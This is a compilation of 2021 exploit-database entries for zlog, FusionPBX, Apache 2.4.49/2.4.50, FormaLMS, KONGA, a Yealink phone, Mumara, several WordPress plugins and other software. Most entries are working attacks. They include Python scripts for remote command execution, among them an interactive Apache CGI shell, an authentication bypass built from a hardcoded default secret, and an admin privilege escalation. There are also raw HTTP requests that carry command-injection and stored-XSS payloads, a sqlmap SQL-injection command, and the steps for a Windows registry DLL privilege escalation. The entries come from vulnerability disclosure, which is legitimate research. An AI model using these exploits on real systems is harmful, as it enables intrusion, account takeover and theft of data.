# Exploit Title: zlog 1.2.15 - Buffer Overflow # Date: 10/23/2021 # Exploit Author: LIWEI # Vendor Homepage: https://github.com/HardySimpson/zlog # Software Link: https://github.com/HardySimpson/zlog # Version: v1.2.15 # Tested on: ubuntu 18.04.2 # 1.- compile the zlogv1.2.15 code to a library. # 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below. # 3.- crash. because it made a stack-buffer-overflow READ. # 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20". # 5.- Here are the crash backtrace. #0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15 #1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7 #2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18 #3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6 #4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18 And also my testcase: #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include "zlog.h" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { char filename[256]; sprintf(filename, "/tmp/libfuzzer.%d", getpid()); FILE *fp = fopen(filename, "wb"); if (!fp) return 0; fwrite(data, size, 1, fp); fclose(fp); int rc = zlog_init(filename); if (rc == 0) { zlog_fini(); } unlink(filename); remove(filename); return 0; } Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++" Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it.

# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated) # Date: 11/08/2021 # Exploit Author: Luska # Vendor Homepage: https://www.fusionpbx.com/ # Software Link: https://github.com/fusionpbx/fusionpbx # Version: < 4.5.30 # Tested on: Debian # CVE : CVE-2021-43405 #!/usr/bin/python3 import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import argparse cookies = {'PHPSESSID': '31337'} proxy = {'http': 'http://127.0.0.1:8080'} def login(url, username, password): data = { 'username': username, 'password': password } r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies) return r.status_code def exploit_request(url, cmd): print('[+] Sending Exploit Request') mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send' }) r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies, headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxy) return r.status_code def exploit(url, username, password, cmd): if login(url,username,password) == 200: print('[+] Login Successful') exploit_request(url, cmd) print('[+] Exploit Sucessful') else: print('[-] Login Failed') if __name__ == '__main__': parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405') parser.add_argument('-t', metavar='<target/host URL>', help='Target/host URL, example: http://127.0.0.1', required=True) parser.add_argument('-u', metavar='<user>', help='User to login', required=True) parser.add_argument('-p', metavar='<password>', help='User\'s password', required=True) parser.add_argument('-c', metavar='<cmd>', help='Command to be executed', required=True) args = parser.parse_args() target = args.t user = args.u password = args.p cmd = args.c exploit(target, user, password, cmd)

# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS) # Date: 09/11/2021 # Exploit Author: Ragavender A G # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: v1.0 # Tested on: Windows 10 *Exploit:* 1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance 2. Add New department with the following value: - Name: *<svg/onload=alert(1)>* 3. Save the Department and refresh the page, which should trigger the payload. *PoC:* POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/edtms/edtms/admin/?page=maintenance Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3 id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1

# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) # Date: 10.11.2021 # Exploit Author: İlhami Selamet # Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code # Version: v1.0 # Tested on: Kali Linux + XAMPP v8.0.12 Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department Step 1 - Click on the 'Create New' button for adding a new department. Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script> Step 3 - Save the department. The stored XSS triggers for all users that navigate to the 'Department List' page. PoC POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888 Content-Length: 555 Origin: http://localhost Connection: close Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54 -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="id" -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="name" <script>alert(document.cookie);</script> -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="description" desc -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="status" 1 -----------------------------407760789114464123714007564888--

# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) # Date: 11-10-2021 # Exploit Author: tahaafarooq # Vendor Homepage: https://www.yealink.com/ # Version: 53.84.0.15 # Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone) Description: Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection POC: POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 49 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID=9a83d24461329a130 Connection: close cmd=; id;&token=1714636915c6acea98 ------------------------------------------------- HTTP/1.1 200 OK Content-Type: text/html Connection: close Date: Wed, 10 Nov 2021 14:20:23 GMT Server: embed httpd Content-Length: 82 <html> <body> <div id="_RES_INFO_"> uid=0(root) gid=0(root) </div> </body> </html>

# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-10 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe # Tested Version: 11.24 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC) # Steps to reproduce: # 1. - Download and install AbsoluteTelnet # 2. - Run the python script and it will create exploit.txt file. # 3. - Open AbsoluteTelnet 11.24 # 4. - "new connection file -> Connection -> SSH1 & SSH2" # 5. - Paste the characters of txt file to "Authentication -> Username" # 6. - press "ok" button # 7. - Crashed # 8. - Reopen AbsoluteTelnet 11.24 # 9. - Copy the same characters to "Your Email Address (optional)" # 10.- Click "Send Error Report" button # 11.- Crashed #!/usr/bin/python exploit = 'A' * 1000 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")

# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-10 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe # Tested Version: 11.24 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC) # Steps to reproduce: # 1. - Download and install AbsoluteTelnet # 2. - Run the python script and it will create exploit.txt file. # 3. - Open AbsoluteTelnet 11.24 # 4. - "new connection file -> DialUp Connection # 5. - Paste the characters of txt file to "DialUp -> phone" # 6. - press "ok" button # 7. - Crashed # 8. - Reopen AbsoluteTelnet 11.24 # 9. - Copy the same characters to "license name" # 10.- Click "Send Error Report" button # 11.- Crashed #!/usr/bin/python exploit = 'A' * 1000 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")

# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) # Date: 11/11/2021 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.49/2.4.50 (CGI enabled) # Tested on: Debian GNU/Linux # CVE : CVE-2021-41773 / CVE-2021-42013 # Credits : Lucas Schnell #!/usr/bin/env python3 #coding: utf-8 import os import re import sys import time import requests from colorama import Fore,Style header = '''\033[1;91m ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ''' + Style.RESET_ALL if len(sys.argv) < 2 : print( 'Use: python3 file.py ip:port ' ) sys.exit() def end(): print("\t\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) def commands(url,command,session): directory = mute_command(url,'pwd') user = mute_command(url,'whoami') hostname = mute_command(url,'hostname') advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") command = f"echo; {command};" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text print(output) if 'clear' in command: os.system('/usr/bin/clear') print(header) if 'exit' in command: end() def mute_command(url,command): session = requests.Session() req = requests.Request('POST', url=url, data=f"echo; {command}") prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) return response.text.strip() def exploitRCE(payload): s = requests.Session() try: host = sys.argv[1] if 'http' not in host: url = 'http://'+ host + payload else: url = host + payload session = requests.Session() command = "echo; id" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text if "uid" in output: choice = "Y" print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) print("[!] Sortie:\n\n" + Fore.YELLOW + output ) choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ") if choice.lower() in ['','y','yes']: while True: commands(url,command,session) else: end() else : print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) except KeyboardInterrupt: end() def main(): try: apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' payloads = [apache2449_payload,apache2450_payload] choice = len(payloads) + 1 print(header) print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") while choice >= len(payloads) and choice >= 0: choice = int(input('[~] Choice : ')) if choice < len(payloads): exploitRCE(payloads[choice]) except KeyboardInterrupt: print("\n\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) if __name__ == '__main__': main()

# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass # Google Dork: inurl:index.php?r=adm/ # Date: 2021-11-10 # Exploit Author: Cristian 'void' Giustini @ Hacktive Security # Vendor Homepage: https://formalms.org # Software Link: https://formalms.org # Version: <= 2.4.4 # Tested on: Linux # CVE : CVE-2021-43136 # Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform. # Analysis: https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/ # Nuclei template: https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml #!/usr/bin/env python """ The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled """ import sys import time import hashlib secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c" def help(): print(f"Usage: {sys.argv[0]} username target_url") sys.exit() if len(sys.argv) < 3: help() user, url = (sys.argv[1], sys.argv[2]) t = str(int(time.time()) + 5000) token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper() final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}" print(f"URL with default secret: {final_url}") token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper() final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}" print(f"URL with empty secret: {final_url}")

# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) # Date: 11/11/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: http://www.wpsymposiumpro.com/ # Software Link: https://wordpress.org/plugins/wp-symposium-pro/ # Version: 2021.10 # Tested on : Windows 10 #Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label. #Poc: POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup Content-Type: application/x-www-form-urlencoded Content-Length: 129 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test ---------------------------------------------------------------------------------- ## After adding new forum, click created forum and pop-up will be on the screen.

# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) # Date: 11/12/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://wordpress.org/plugins/accesspress-social-icons/ # Version: 1.8.2 # Tested on : Windows 10 #Poc: 1. Install Latest WordPress 2. Install and activate AccessPress Social Icons 1.8.2 3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields. 4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list". <img src=x onerror=confirm('xss')> 4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.

# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-12 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link: https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.1 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC) # Steps to reproduce: # 1. - Download and Xlight FTP # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP 3.9.3.1 # 4. - "File and Directory - Access Control List - Setup - Added users list directories # 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied # 6. - Go to Setup -> added -> Enter new Item - Paste the characters # 7 - Crashed #!/usr/bin/python exploit = 'A' * 550 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")

# Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation # Date: 11/11/2021 # Exploit Author: it # Vendor Homepage: https://www.microsoft.com # Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518 # Version: Version 6.1 Compilation 7601 Service Pack 1 # Tested on: Microsoft Windows MultiPoint Server 2011 - English Version Description Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Vulnerable: |Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache Vulnerability Type: Privilege Escalation Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Compilation 7601 Service Pack 1 Language OS: English The Vulnerability Clément wrote a very useful permissions-checking tool for Windows that find various misconfigurations in Windows that could allow a local attacker to elevate their privileges. On a typical Windows 7 and Server 2008 R2 machine, the tool found that all local users have write permissions on two registry keys: HKLM\SYSTEM\CurrentControlSet\Services\Dnscache HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper These didn't immediately seem exploitable, but Clément did the legwork and found the Windows Performance Monitoring mechanism can be made to read from these keys - and eventually load the DLL provided by the local attacker. To most everyone's surprise, not as the local user, but as Local System. In short, a local non-admin user on the computer just creates a Performance subkey in one of the above keys, populates it with some values, and triggers performance monitoring, which leads to a Local System WmiPrvSE.exe process loading attacker's DLL and executing code from it. About Artiche: https://itm4n.github.io/windows-registry-rpceptmapper-eop/ I detected that in another version of windows it is also vulnerable, Windows Multipoint 2011, which can affect customers who use extended license; I can't say if there are any other vulnerable unpublished versions besides the ones I've posted here How to Produce Exploitation Compile Exploit Perfusion in Visual Studio 2019 - Open Project, Make Release x64 and Compile. Is necessary install microsoft visual c++ redistributable on Windows MultiPoint 2011 for execute exploit The exploit Add Subkeys in HKLM\SYSTEM\CurrentControlSet\Services\Dnscache HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance Library = Name of your performance DLL Open = Name of your Open function in your DLL Collect = Name of your Collect function in your DLL Close = Name of your Close function in your DLL and Exploit Write payload dll hijacking, call dll with permission SYSTEM using WMI Tools and Exploit: https://github.com/itm4n/PrivescCheck Exploit: https://github.com/itm4n/Perfusion

# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated) # Date: 2021-11-11 # Exploit Author: (v0yager) Shain Lakin # Vendor Homepage: https://mumara.com # Version: <= 2.93 # Tested on: CentOS 7 -==== Vulnerability ====- An SQL injection vulnerability in license_update.php in Mumara Classic through 2.93 allows a remote unauthenticated attacker to execute arbitrary SQL commands via the license parameter. -==== POC ====- Using SQLMap: sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql

# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) # Date: 20/08/2021 # Exploit Author: Davide Taraschi # Vendor Homepage: https://wpschoolpress.com/ # Software Link: https://wpschoolpress.com/free-download/ # Version: up to 2.1.17 (non included) # Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2 # CVE : CVE-2021-24664 # Description: The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues. The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript. # PoC: As admin, - Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another teacher attendance by clicking on the Add button - Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button - Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3) - Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Subject - Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Exam=20 Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.

# Exploit Title: KONGA 0.14.9 - Privilege Escalation # Date: 10/11/2021 # Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec) # Vendor Homepage: https://github.com/pantsel/konga # Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip # Version: 0.14.9 # Tested on: Linux - Ubuntu 20.04.3 LTS (focal) import requests import json urlkonga = "http://www.example.com:1337/" # change to your konga address identifier = "usernormalkonga" # change user password = "changeme" # change password headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/json;charset=utf-8", "connection-id": "", "Origin": urlkonga, "Referer": urlkonga } url = urlkonga+"login" data = { "identifier":identifier, "password":password } response = requests.post(url, json=data) json_object = json.loads(response.text) print("[+] Attack") print("[+] Token " + json_object["token"]) url2 = urlkonga+"api/user/"+str(json_object["user"]["id"]) id = json_object["user"]["id"] print("[+] Exploiting User ID "+str(json_object["user"]["id"])) data2 = { "admin": "true", "passports": { "password": password, "protocol": "local" }, "password_confirmation": password, "token":json_object["token"] } print("[+] Change Normal User to Admin") response2 = requests.put(url2, headers=headers, json=data2) print("[+] Success")